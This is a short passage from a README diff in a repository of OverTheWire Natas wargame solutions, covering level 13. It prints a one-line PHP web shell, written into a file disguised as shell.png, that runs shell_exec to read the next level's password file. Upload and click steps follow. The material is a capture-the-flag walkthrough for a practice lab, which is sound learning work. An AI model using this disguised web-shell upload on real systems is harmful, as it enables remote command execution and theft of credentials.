unpwnabl/OverTheWire-Natas-Solutions/README.md

 echo '<?php $output = shell_exec("cat /../../../etc/natas_webpass/natas14"); echo $output; ?>' >> shell.png
 # ...
 ```
+Simply reuploading [`shell.php`](/scripts/lvl13/shell.php) and clicking it, we can see the password.

 ## Level 14 <a name="level14"></a>
 Landing on the site, we see this: